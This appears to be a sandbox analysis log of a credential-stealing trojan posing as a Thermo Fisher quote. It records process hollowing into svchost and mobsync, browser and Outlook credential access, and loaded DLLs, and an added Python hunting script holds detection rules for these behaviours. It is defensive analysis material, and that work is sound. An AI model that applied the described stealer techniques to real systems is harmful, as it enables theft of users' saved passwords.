Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043C02C0
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043FA352
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_044003E6
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0434E3F0
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04340C00
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043E0CB5
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04330CF2
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043DCD1F
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0434AD00
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04358DBF
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0433ADE0
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043FEE26
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04340E59
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04352E90
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043FCE93
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043FEEDB
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04360F30
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043E2F30
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04382F28
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043B4F40
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043BEFA0
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0434CFE0
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04332FC8
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0434A840
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04342840
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043268B8
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0436E8F0
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04356962
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043429A0
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0440A9A6
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0433EA80
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043FAB40
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043F6BD7
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043FF43F
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04331460
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043F7571
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043DD5B0
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043F16CC
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043FF7B0
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043F70E9
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043FF0E0
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043EF0CC
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043470C0
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0440B16B
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0432F172
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0437516C
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0434B1B0
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043452A0
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043E12ED
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0435B2C0
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043F132D
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0432D34C
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0438739A
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043B9C32
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043FFCF2
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043F7D73
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043F1D5A
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04343D40
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0435FDC0
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04349EB0
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043FFF09
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043FFFB1
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04341F92
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04303FD2
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04303FD5
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043AD800
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043438E0
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043D5910
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04349950
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0435B950
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043B3A6C
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043FFA49
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043F7A46
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043DDAAC
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04385AA0
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043E1AA3
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043EDAC6
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043FFB76
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0435FB80
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043B5BF0
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0437DBF9
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_00151CB0
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0014CB80
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0014AD80
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0014CDA0
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0014AED0
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0014AEC4
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_00155340
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_00153540
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0016BA30
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0419E50B
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0419E741
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0419E288
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_041A533C
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0419E3A3
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0419D808
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0419CA98
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03B75130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03BBF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03BAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03B2B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03B87E54 appears 102 times
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: String function: 04375130 appears 58 times
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: String function: 043BF290 appears 105 times
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: String function: 043AEA12 appears 86 times
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: String function: 04387E54 appears 102 times
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: String function: 0432B970 appears 280 times
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: String function: 0062F8A0 appears 35 times
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: String function: 0061EC2F appears 68 times
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: String function: 00626AC0 appears 42 times
Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, 00000000.00000003.2062568675.000000000374D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe
Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, 00000000.00000003.2056345964.00000000035A3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe
Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@11/10
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: 0_2_0064CE7A GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: 0_2_0063AB84 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: 0_2_0063B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: 0_2_0064E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: 0_2_00646532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: 0_2_0065C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: 0_2_0060406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | File created: C:\Users\user\AppData\Local\Temp\aut550.tmp
Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: mobsync.exe, 00000005.00000002.3902827656.000000000293E000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3902827656.0000000002911000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2464262219.000000000291C000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2462008162.00000000028EF000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2462117569.0000000002911000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | ReversingLabs: Detection: 42%
Source: unknown | Process created: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe "C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe"
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe"
Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | Process created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"
Source: C:\Windows\SysWOW64\mobsync.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Static file information: File size 1208320 > 1048576
Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
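The process-creation, section-load and registry lines above describe a recognisable FormBook pattern: a SysWOW64 system binary (svchost.exe) started with the dropper's own command line, a second system binary (mobsync.exe) spawned by a dropped executable and then launching Firefox, a non-browser process loading winsqlite3.dll, vaultcli.dll and dpapi.dll together, and that same process opening the Outlook profile key. The following script is an added hunting example and is not part of the Joe Sandbox report; the event records are constructed to mirror the report's lines, and the field names (image, cmdline, parent_image, module, key) are an assumed, Sysmon-like schema rather than any real product's format.

```python
"""Hunting rules for the process tree, module loads and registry access listed
in this report. Added example, not part of the Joe Sandbox report: EVENTS is
constructed to mirror the report's lines and the field names are assumptions."""
import ntpath
from collections import defaultdict

BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
# DLL trio a stealer needs to read a Chromium "Login Data" SQLite store and
# decrypt the DPAPI/Credential Manager protected blobs in it.
CRED_DLLS = {"winsqlite3.dll", "dpapi.dll", "vaultcli.dll"}
SYSTEM_DIRS = ("\\windows\\system32\\", "\\windows\\syswow64\\")

DROPPER = r"C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe"
INJECTOR = r"C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe"
MOBSYNC = r"C:\Windows\SysWOW64\mobsync.exe"
FIREFOX = r"C:\Program Files\Mozilla Firefox\firefox.exe"

# Constructed events (not captured telemetry), each modelled on a report line.
EVENTS = [
    {"type": "process_create", "pid": 2, "image": r"C:\Windows\SysWOW64\svchost.exe",
     "cmdline": f'"{DROPPER}"', "parent_image": DROPPER},
    {"type": "process_create", "pid": 5, "image": MOBSYNC,
     "cmdline": f'"{MOBSYNC}"', "parent_image": INJECTOR},
    {"type": "process_create", "pid": 7, "image": FIREFOX,
     "cmdline": r'"C:\Program Files\Mozilla Firefox\Firefox.exe"', "parent_image": MOBSYNC},
    # Benign control: a normal service host started by services.exe.
    {"type": "process_create", "pid": 9, "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs",
     "parent_image": r"C:\Windows\System32\services.exe"},
    {"type": "image_load", "pid": 5, "image": MOBSYNC, "module": r"C:\Windows\SysWOW64\wininet.dll"},
    {"type": "image_load", "pid": 5, "image": MOBSYNC, "module": r"C:\Windows\SysWOW64\winsqlite3.dll"},
    {"type": "image_load", "pid": 5, "image": MOBSYNC, "module": r"C:\Windows\SysWOW64\vaultcli.dll"},
    {"type": "image_load", "pid": 5, "image": MOBSYNC, "module": r"C:\Windows\SysWOW64\dpapi.dll"},
    {"type": "registry_open", "pid": 5, "image": MOBSYNC,
     "key": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook"},
]


def base(path):
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()


def cmdline_image(cmdline):
    """First token of a Windows command line, honouring a quoted image path."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(" ", 1)[0]


def hunt(events):
    """Return (rule, pid, detail) tuples for every event that matches a rule."""
    hits = []
    loads = defaultdict(set)  # (pid, image name) -> set of loaded module names
    for e in events:
        if e["type"] == "process_create":
            img, parent = base(e["image"]), base(e["parent_image"])
            # Hollowing tell: the image on disk is not the program named on the command line.
            if base(cmdline_image(e["cmdline"])) != img:
                hits.append(("image_cmdline_mismatch", e["pid"], f"{img} started as {e['cmdline']}"))
            # svchost.exe is only ever started by services.exe on a healthy host.
            if img == "svchost.exe" and parent != "services.exe":
                hits.append(("svchost_bad_parent", e["pid"], f"parent {parent}"))
            # A browser launched by a System32/SysWOW64 binary is how stealers pop the profile open.
            if img in BROWSERS and any(d in e["parent_image"].lower() for d in SYSTEM_DIRS):
                hits.append(("browser_from_system_binary", e["pid"], f"parent {parent}"))
        elif e["type"] == "image_load":
            loads[(e["pid"], base(e["image"]))].add(base(e["module"]))
        elif e["type"] == "registry_open":
            if "\\outlook\\profiles\\" in e["key"].lower() and base(e["image"]) != "outlook.exe":
                hits.append(("outlook_profile_access", e["pid"], e["key"]))
    for (pid, img), mods in loads.items():
        if CRED_DLLS <= mods and img not in BROWSERS:
            hits.append(("credential_store_dll_set", pid, f"{img} loaded {sorted(CRED_DLLS)}"))
    return hits


if __name__ == "__main__":
    for rule, pid, detail in hunt(EVENTS):
        print(f"[{rule}] pid={pid}: {detail}")
```

Each rule is cheap to run over process-creation and image-load telemetry and does not depend on the random directory and file names the sample uses. The browser-parent rule will also fire on legitimate launches from cmd.exe or rundll32.exe in System32, so tune it with an allow-list for your environment before alerting on it.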
                Source: Binary string: mobsync.pdbGCTL source: svchost.exe, 00000002.00000003.2244014500.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2244035599.0000000003431000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2243889902.000000000341B000.00000004.00000020.00020000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000004.00000002.3903019031.0000000000608000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uxnRAYhIPZRPiA.exe, 00000004.00000000.2197419615.00000000003AE000.00000002.00000001.01000000.00000005.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000002.3902431291.00000000003AE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, 00000000.00000003.2061270597.0000000003480000.00000004.00001000.00020000.00000000.sdmp, Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, 00000000.00000003.2053926155.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2275476735.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2275476735.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2181650886.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2179858851.0000000003700000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2277653392.0000000003F93000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3903807433.0000000004300000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3903807433.000000000449E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2283578724.000000000414B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, 00000000.00000003.2061270597.0000000003480000.00000004.00001000.00020000.00000000.sdmp, Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, 00000000.00000003.2053926155.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2275476735.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2275476735.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2181650886.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2179858851.0000000003700000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, mobsync.exe, 00000005.00000003.2277653392.0000000003F93000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3903807433.0000000004300000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3903807433.000000000449E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2283578724.000000000414B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mobsync.pdb source: svchost.exe, 00000002.00000003.2244014500.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2244035599.0000000003431000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2243889902.000000000341B000.00000004.00000020.00020000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000004.00000002.3903019031.0000000000608000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: mobsync.exe, 00000005.00000002.3902827656.0000000002899000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3904399243.000000000492C000.00000004.10000000.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000002.3903868529.0000000002E9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2570901643.0000000038D4C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: mobsync.exe, 00000005.00000002.3902827656.0000000002899000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3904399243.000000000492C000.00000004.10000000.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000002.3903868529.0000000002E9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2570901643.0000000038D4C000.00000004.80000000.00040000.00000000.sdmp
